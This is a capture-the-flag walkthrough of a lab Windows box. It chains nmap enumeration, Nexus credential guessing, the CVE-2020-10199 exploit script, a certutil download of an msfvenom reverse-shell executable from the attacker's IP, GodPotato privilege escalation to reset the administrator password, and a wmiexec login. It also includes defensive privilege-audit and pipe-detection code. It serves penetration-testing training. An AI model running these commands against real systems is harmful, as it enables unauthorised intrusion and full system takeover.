June 2, 2026
BillyBoss | Proving Grounds | OSCP Preparation
Box: Billyboss Community Rating: Hard
SilentExploit
As always, start off with a comprehensive nmap scan of the target:
┌──(root㉿user)-[/run/…/tools/winprivesc/Win-Potato/GodPotato]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-02 16:18 BST
Initiating Parallel DNS resolution of 1 host. at 16:18
Completed Parallel DNS resolution of 1 host. at 16:18, 0.02s elapsed
Initiating SYN Stealth Scan at 16:18
Scanning 192.168.148.61 [65535 ports]
Discovered open port 80/tcp on 192.168.148.61
Discovered open port 21/tcp on 192.168.148.61
Discovered open port 135/tcp on 192.168.148.61
Discovered open port 445/tcp on 192.168.148.61
Discovered open port 139/tcp on 192.168.148.61
Discovered open port 49669/tcp on 192.168.148.61
Discovered open port 49667/tcp on 192.168.148.61
Discovered open port 8081/tcp on 192.168.148.61
Discovered open port 49665/tcp on 192.168.148.61
Discovered open port 49668/tcp on 192.168.148.61
Discovered open port 49666/tcp on 192.168.148.61
Discovered open port 5040/tcp on 192.168.148.61
Discovered open port 49664/tcp on 192.168.148.61
Completed SYN Stealth Scan at 16:18, 15.13s elapsed (65535 total ports)
Nmap scan report for 192.168.148.61
Host is up (0.027s latency).
Not shown: 53882 closed tcp ports (reset), 11640 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
8081/tcp open blackice-icecap
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
Raw packets sent: 93197 (4.101MB) | Rcvd: 54095 (2.164MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-02 16:18 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:18
Completed Parallel DNS resolution of 1 host. at 16:18, 0.01s elapsed
Initiating SYN Stealth Scan at 16:18
Scanning 192.168.148.61 [1000 ports]
Discovered open port 135/tcp on 192.168.148.61
Discovered open port 445/tcp on 192.168.148.61
Discovered open port 80/tcp on 192.168.148.61
Discovered open port 21/tcp on 192.168.148.61
Discovered open port 139/tcp on 192.168.148.61
Discovered open port 8081/tcp on 192.168.148.61
Completed SYN Stealth Scan at 16:18, 3.60s elapsed (1000 total ports)
Initiating Service scan at 16:18
Scanning 6 services on 192.168.148.61
Completed Service scan at 16:18, 7.74s elapsed (6 services on 1 host)
NSE: Script scanning 192.168.148.61.
Initiating NSE at 16:18
Completed NSE at 16:18, 8.11s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.19s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Nmap scan report for 192.168.148.61
Host is up (0.022s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-favicon: Unknown favicon MD5: 8D9ADDAFA993A4318E476ED8EB0C8061
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: BaGet
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
8081/tcp open http Jetty 9.4.18.v20190429
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: Nexus/3.21.0-05 (OSS)
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
|_http-favicon: Unknown favicon MD5: 9A008BECDE9C5F250EDAD4F00E567721
|_http-title: Nexus Repository Manager
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<SNIP>
We can then go through and begin probing each service, port by port.
I have summarised my preliminary findings below:
Port 21 (FTP): no luck brute forcing.
Port 135 (RPC): attempted rpcclient with anonymous access (failed).
Port 139,445 (SMB): no anonymous access.
Port 80 (website)
This site is hosting BaGet, a lightweight NuGet and symbol server. It is open source, but I couldn't find any information regarding public exploits. I attempted directory enumeration with dirsearch and ffuf, but this didn't lead anywhere, so I marked it as a potential (but unlikely) entry vector.
Port 8081
Sonatype Nexus Repository Manager (OSS 3.21.0-05) is a widely used open-source repository manager that serves as a centralized hub for managing software components, binaries, and build artifacts.
We can see that we have a sign-in function but no credentials. Hunting down default credentials led me to note that there don't appear to be any.
I did a quick search using creds, but this failed to yield the correct login:
┌──(venv)─(root㉿user)-[/tmp/DefaultCreds-cheat-sheet]
└─# creds search "nexus repository"
+--------------------------------+----------+----------+
| Product | username | password |
+--------------------------------+----------+----------+
| nexus repository manager (web) | admin | admin123 |
+--------------------------------+----------+----------+
At this point, I had used username-anarchy to generate a list of potential username / password combinations based on the Sonatype Nexus Repository Manager and the possibility of 'admin' also being the username.
The correct login ends up being — nexus:nexus
I thought this was a little bit of a sneaky move by Offsec and would hope that the OSCP is more logical with the bruteforcing / password guessing.
Initial foothold
Initially, I spent a lot of time on this box trying to bypass authentication entirely by using the path traversal vulnerability (listed in the searchsploit output below) to obtain the login credentials.
This left me with only one potential exploit: CVE-2020-10199, an authenticated RCE vulnerability caused by a failure to properly validate user-submitted data in administrative templates. As we now have credentials to log in, we can exploit this flaw by submitting a crafted request to inject and execute arbitrary Java code on the underlying server.
┌──(venv)─(root㉿user)-[/tmp/DefaultCreds-cheat-sheet]
└─# searchsploit 'sonatype nexus'
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | java/webapps/49385.py
Sonatype Nexus Repository 3.53.0-01 - Path Traversal | multiple/webapps/52101.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Grab a copy of the exploit and then begin modification:
┌──(venv)─(root㉿user)-[/tmp/DefaultCreds-cheat-sheet]
└─# searchsploit -m java/webapps/49385.py
Lines 22–25 are the only sections that will require modification in order for the exploit to be successful:
It took some trial and error for me, as I initially transferred netcat onto the target and executed that for a reverse shell; it would provide a reverse connection, but the shell was totally dumb. I then tried to utilise PowerShell's IEX module to trigger a reverse shell from the target, but this also failed.
Finally, I switched to creating an executable with msfvenom (shell1.exe):
┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.223 LPORT=4444 -f exe > shell1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
I then modified the exploit script's CMD variable and ran it twice: first to download the malicious shell we created above, then to execute it:
CMD="cmd.exe /c certutil.exe -urlcache -split -f http://192.168.45.223/shell1.exe C:/Windows/Temp/shell1.exe"
CMD="cmd.exe /c C:/Windows/Temp/shell1.exe"
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# python3 49385.py
Logging in
Logged in successfully
Command executed
Privilege Escalation
With a shell as Nathan, I immediately checked to see what privileges he holds and was confronted with the coveted SeImpersonatePrivilege. This is a gold mine for privilege escalation, as it opens up the possibility of the Potato family of attacks alongside other LPE tools such as PrintSpoofer.
C:\Users\nathan\Nexus\nexus-3.21.0-05>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
After some time experimenting, I switched to GodPotato. This has the potential to work on Windows 2012 through Windows 2022, making it much more applicable to the target.
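A defender-side check for what the `whoami /priv` output above reveals, written in Python as an added example (not part of the original post): it parses the output and flags privileges that are well-known local privilege escalation enablers, SeImpersonatePrivilege being the one the Potato family abuses. The sample input is the box's own output re-aligned by hand, and the HIGH_RISK_PRIVILEGES table is my own selection.

```python
import re

# Privileges whose mere presence in a service-account or low-privileged token
# is a known LPE enabler. The first two are what the Potato family (GodPotato on
# this box) and PrintSpoofer abuse. This table is an assumption of the example.
HIGH_RISK_PRIVILEGES = {
    "SeImpersonatePrivilege": "token impersonation (Potato family, PrintSpoofer)",
    "SeAssignPrimaryTokenPrivilege": "primary token assignment (Potato family)",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeDebugPrivilege": "open and inject into any process",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
}

# Constructed sample: the `whoami /priv` output from the nathan shell, re-aligned.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# One privilege row: name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def audit_privileges(text):
    """Return (privilege, state, why_it_matters) for every risky privilege held.

    A Disabled privilege still counts: whoami only lists privileges present in
    the token, and a present-but-disabled one can be switched on by the process
    itself with AdjustTokenPrivileges.
    """
    privs = parse_whoami_priv(text)
    return [(name, privs[name], why)
            for name, why in HIGH_RISK_PRIVILEGES.items() if name in privs]


if __name__ == "__main__":
    for name, state, why in audit_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"[!] {name} ({state}): {why}")
```

The mitigation is to run services such as Nexus under a dedicated account or a virtual service account that is not granted SeImpersonatePrivilege, rather than under NETWORK SERVICE or a local user that has it.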
If you look at the GodPotato repository you will see there are builds for different .NET versions; you can run the following command to check which .NET Framework version is installed on the machine:
C:\Users\nathan\desktop>reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s /v Version | findstr /i "version"
Version REG_SZ 4.8.03752
Version REG_SZ 4.8.03752
Version REG_SZ 4.8.03752
Version REG_SZ 4.8.03752
Version REG_SZ 4.0.0.0
The above output confirmed that we are dealing with .NET 4, so I went ahead and executed GodPotato-NET4.exe via the following syntax:
C:\Users\nathan\Nexus\nexus-3.21.0-05>./GodPotato-NET4.exe -cmd "cmd /c whoami"
./GodPotato-NET4.exe -cmd "cmd /c whoami"
'.' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\nathan\Nexus\nexus-3.21.0-05>GodPotato-NET4.exe -cmd "cmd /c whoami"
GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140711670317056
[*] DispatchTable: 0x140711672659552
[*] UseProtseqFunction: 0x140711672027584
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\889ea17c-1fa0-4606-bf34-0af137ab7545\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000f002-11d0-ffff-bad1-dcdf654d7aac
[*] DCOM obj OXID: 0x8035bc449f3f33cc
[*] DCOM obj OID: 0x59dcda1b700c9f00
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x656 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2524
CurrentUser: NT AUTHORITY\SYSTEM; we can see that we have successfully executed the command while impersonating NT AUTHORITY\SYSTEM. There were a few ways we could proceed here; I decided to simply change the administrator's password via the following syntax:
C:\Users\nathan\Nexus\nexus-3.21.0-05>GodPotato-NET4.exe -cmd "cmd /c net user administrator newpassword123"
GodPotato-NET4.exe -cmd "cmd /c net user administrator newpassword123"
[*] CombaseModule: 0x140711670317056
[*] DispatchTable: 0x140711672659552
[*] UseProtseqFunction: 0x140711672027584
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\04f24fdd-cbd4-4de9-81d1-9bcf637c18c5\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0c7c-ffff-537e-2c9faa0dd8f6
[*] DCOM obj OXID: 0x88d6603b66573e13
[*] DCOM obj OID: 0x907cfef0837c2687
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x656 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1704
The command completed successfully.
In real life I don't think the client would be happy with you changing an administrator's password but … this is only a CTF so don't worry. haha.
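Both GodPotato runs above print the named pipe they create, \\.\pipe\<GUID>\pipe\epmapper, and that pipe name is the artefact a detection engineer can key on. The following Python is an added example, not part of the original post: it matches Sysmon pipe events (Event ID 17 Pipe Created, Event ID 18 Pipe Connected) whose PipeName mimics the RPC endpoint mapper beneath a GUID-named prefix. The sample events are constructed, modelled on the pipe name printed on this box, with the Sysmon fields reduced to EventID, Image and PipeName.

```python
import re

# GodPotato's lure, visible in the output above, is a named pipe of the form
#   \\.\pipe\<GUID>\pipe\epmapper
# so that RPCSS connects to the attacker's pipe believing it is the RPC
# endpoint mapper, whose genuine pipe is simply "\epmapper".
GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
FAKE_EPMAPPER = re.compile(r"^\\" + GUID + r"\\pipe\\epmapper$", re.IGNORECASE)

PIPE_CREATED, PIPE_CONNECTED = 17, 18  # Sysmon PipeEvent IDs

# Constructed sample events. The GUID is the one GodPotato printed on this box;
# the images are assumptions for the sake of the example.
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe",
     "PipeName": r"\epmapper"},                       # genuine endpoint mapper
    {"EventID": 17, "Image": r"C:\Users\nathan\Nexus\nexus-3.21.0-05\GodPotato-NET4.exe",
     "PipeName": r"\889ea17c-1fa0-4606-bf34-0af137ab7545\pipe\epmapper"},
    {"EventID": 18, "Image": r"C:\Windows\System32\svchost.exe",
     "PipeName": r"\889ea17c-1fa0-4606-bf34-0af137ab7545\pipe\epmapper"},  # RPCSS lured in
    {"EventID": 17, "Image": r"C:\Program Files\App\app.exe",
     "PipeName": r"\app-worker-1"},                   # unrelated application pipe
]


def is_fake_epmapper_pipe(pipe_name):
    """True when a pipe name mimics \\epmapper beneath a GUID-named directory."""
    return FAKE_EPMAPPER.match(pipe_name) is not None


def detect_potato_pipes(events):
    """Return (EventID, Image, PipeName) for every creation of, or connection to,
    a fake endpoint-mapper pipe. The creation (17) names the process running the
    Potato; a following connection (18) from the RPCSS service host confirms the
    lure worked and a SYSTEM token was presented to it."""
    hits = []
    for ev in events:
        if (ev.get("EventID") in (PIPE_CREATED, PIPE_CONNECTED)
                and is_fake_epmapper_pipe(ev.get("PipeName", ""))):
            hits.append((ev["EventID"], ev["Image"], ev["PipeName"]))
    return hits


if __name__ == "__main__":
    for event_id, image, pipe in detect_potato_pipes(SAMPLE_EVENTS):
        verb = "created by" if event_id == PIPE_CREATED else "connected to by"
        print(f"[!] fake epmapper pipe {pipe} {verb} {image}")
```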
I confirmed the password change was successful via netexec:
┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.223] from (UNKNOWN) [192.168.148.61] 50136
┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# nxc smb 192.168.148.61 -u administrator -p newpassword123
SMB 192.168.148.61 445 BILLYBOSS [*] Windows 10 / Server 2019 Build 18362 x64 (name:BILLYBOSS) (domain:billyboss) (signing:False) (SMBv1:False)
SMB 192.168.148.61 445 BILLYBOSS [+] billyboss\administrator:newpassword123 (Pwn3d!)
As RDP / WinRM were all closed, I decided to use impacket's wmiexec to spawn a shell directly as the administrator (we could have used psexec, but I find this is a last resort as the shell is often slow):
┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# impacket-wmiexec billyboss/administrator:newpassword123@192.168.148.61
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
billyboss\administrator